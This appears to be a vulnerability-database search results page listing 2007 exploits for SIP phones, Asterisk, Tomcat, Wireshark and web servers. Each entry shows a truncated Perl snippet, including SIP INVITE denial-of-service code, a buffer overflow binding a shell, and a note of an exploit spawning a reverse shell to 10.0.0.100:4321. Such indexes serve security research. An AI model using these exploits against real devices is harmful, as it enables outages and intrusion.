Lucene search
K

878 matches found

Packet Storm
Packet Storm
added 2007/10/18 12:0 a.m.31 views

AST-2007-023-poc.txt

for testing purposes the POC of the vulnerabiliy discovered by the KIPH fuzzer RS !/usr/bin/perl Vulnerabily discovered using KiF Kiph Authors: Humberto J. Abdelnur Ph.D Student Radu State Ph.D Olivier Festor Ph.D Madynes Team, LORIA - INRIA Lorraine http://madynes.loria.fr use IO::Socket::INET;...

7.5CVSS6.6AI score0.0089EPSS
Exploits3
Exploit DB
Exploit DB
added 2007/10/14 12:0 a.m.223 views

Apache Tomcat - 'WebDAV' Remote File Disclosure

!/usr/bin/perl Apache Tomcat Remote File Disclosure Zeroday Xploit kcdarookie aka eliteb0y / 2007 thanx to the whole team & andi : +++KEEP PRIV8+++ This Bug may reside in different WebDav implementations, Warp your mind! +You will need auth for the exploit to work... use IO::Socket; use...

7AI score
Exploits0
Packet Storm
Packet Storm
added 2007/10/05 12:0 a.m.18 views

fsfdt-overflow.txt

$ nc -l -p 4321 Microsoft Windows 2000 Version 5.00.2195 C Copyright 1985-2000 Microsoft Corp. E:\draft\fsd1110\windows ------------------------------------------- !/usr/bin/perl FSFDT remote exploit by weakatfraglab.at spawns reverse shell to 10.0.0.100:4321 tested against 'FSFDT Windows FSD Bet...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2007/08/31 12:0 a.m.10 views

Wireshark 0.99.5 - DNP3 Dissector Infinite Loop

Wireshark 0.99.5 - DNP3 Dissector Infinite Loop !/usr/bin/perl Automatically generated by beSTORMtm Copyright Beyond Security c 2003-2007 $Revision: 3741 $ Attack vector: M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 Module: DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my...

0.4AI score
Exploits0
Exploit DB
Exploit DB
added 2007/08/31 12:0 a.m.30 views

Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop

!/usr/bin/perl Automatically generated by beSTORMtm Copyright Beyond Security c 2003-2007 $Revision: 3741 $ Attack vector: M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 Module: DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host = '192.168.4.52'; my $port = 20000; my...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2007/08/28 12:0 a.m.13 views

Thomson SIP phone ST 2030 Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl Vulneravility for Thomson 2030 firmware v1.52.1 It provokes a DoS in the device. use IO::Socket::INET; die "Usage $0 dst port username" unless $ARGV2; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg = "INVITE...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2007/08/27 12:0 a.m.14 views

Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service

Thomson SpeedTouch ST 2030 SIP Phone - Remote Denial of Service !/usr/bin/perl Vulneravility for Thomson 2030 firmware v1.52.1 It provokes a DoS in the device. use IO::Socket::INET; die "Usage $0 " unless $ARGV2; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg ...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2007/08/27 12:0 a.m.46 views

Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service

!/usr/bin/perl Vulneravility for Thomson 2030 firmware v1.52.1 It provokes a DoS in the device. use IO::Socket::INET; die "Usage $0 " unless $ARGV2; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg = "INVITE sip:$ARGV2@$ARGV0 SIP/2.0\r\nVia: SIP/2.0/UDP...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2007/08/21 12:0 a.m.10 views

Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service

Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service !/usr/bin/perl use IO::Socket::INET; die "Usage $0 " unless $ARGV2; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg = "INVITE sip:$ARGV2@$ARGV0 SIP/2.0\r\nVia:...

1.5AI score
Exploits0
Exploit DB
Exploit DB
added 2007/08/21 12:0 a.m.26 views

Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service

!/usr/bin/perl use IO::Socket::INET; die "Usage $0 " unless $ARGV2; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg = "INVITE sip:$ARGV2@$ARGV0 SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID:...

7.4AI score
Exploits0
0day.today
0day.today
added 2007/08/12 12:0 a.m.25 views

Savant 3.1 Get Request Remote Overflow Exploit (Universal)

Exploit for unknown platform in category remote exploits ========================================================== Savant 3.1 Get Request Remote Overflow Exploit Universal ========================================================== !/usr/bin/perl -w exploit for Savant webserver 3.1 remote bof...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2007/08/12 12:0 a.m.16 views

Savant Web Server 3.1 - GET Universal Remote Overflow

Savant Web Server 3.1 - GET Universal Remote Overflow !/usr/bin/perl -w exploit for Savant webserver 3.1 remote bof shellcode bind 4444 port on target host Jacopo cervini aka [email protected] use IO::Socket; if!$ARGV1 print "Uso: savant-3.1.pl \n\n"; exit; $victim = IO::Socket::INET-newProto='tcp'...

0.5AI score
Exploits0
exploitpack
exploitpack
added 2007/06/21 12:0 a.m.12 views

BugHunter HTTP Server 1.6.2 - httpsv.exe GET 404 Remote Denial of Service

BugHunter HTTP Server 1.6.2 - httpsv.exe GET 404 Remote Denial of Service !/usr/bin/perl GetOpt STD module use IO::Socket; use Getopt::Std; getopts":i:p:",%args; ifdefined $argsi $ip = $argsi; ifdefined $argsp $port = $argsp; if!defined $argsi or !defined $argsp print...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2007/06/21 12:0 a.m.36 views

BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Service

!/usr/bin/perl GetOpt STD module use IO::Socket; use Getopt::Std; getopts":i:p:",%args; ifdefined $argsi $ip = $argsi; ifdefined $argsp $port = $argsp; if!defined $argsi or !defined $argsp print "-----------------------------------------------------\n"; print "HTTP SERVER httpsv1.6.2 404 Denial o...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2007/04/24 12:0 a.m.11 views

Linksys SPA941 - \377 Character Remote Denial of Service

Linksys SPA941 - \377 Character Remote Denial of Service !/usr/bin/perl use IO::Socket::INET; die "Usage $0 " unless $ARGV2; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg = "INVITE sip:$ARGV2@$ARGV0 SIP/2.0\377\r Via: SIP/2.0/UDP...

1AI score
Exploits0
Exploit DB
Exploit DB
added 2007/04/24 12:0 a.m.29 views

Linksys SPA941 - '\377' Character Remote Denial of Service

!/usr/bin/perl use IO::Socket::INET; die "Usage $0 " unless $ARGV2; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg = "INVITE sip:$ARGV2@$ARGV0 SIP/2.0\377\r Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r Max-Forwards: 70\377\r To: lynksys \377\r From:...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2007/03/26 12:0 a.m.50 views

Asterisk <= 1.2.16 / 1.4.1 SIP INVITE Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY use IO::Socket::INET; die "Usage $0 dst dport dusername src sport susername" unless $ARGV5; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp',...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2007/03/25 12:0 a.m.57 views

Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service

!/usr/bin/perl perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY use IO::Socket::INET; die "Usage $0 " unless $ARGV5; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg="INVITE sip:$ARGV2@$ARGV0:$ARGV1 SIP/2.0\r\nVia: SIP/2.0/UDP...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2007/03/25 12:0 a.m.24 views

Asterisk <= 1.2.16 / 1.4.1 SIP INVITE Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY use IO::Socket::INET; die "Usage $0 dst dport dusername src sport susername" unless $ARGV5; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0;...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2007/03/25 12:0 a.m.11 views

Asterisk 1.2.161.4.1 - SIP INVITE Remote Denial of Service

Asterisk 1.2.161.4.1 - SIP INVITE Remote Denial of Service !/usr/bin/perl perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY use IO::Socket::INET; die "Usage $0 " unless $ARGV5; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg="INVITE...

1.3AI score
Exploits0
Rows per page
Query Builder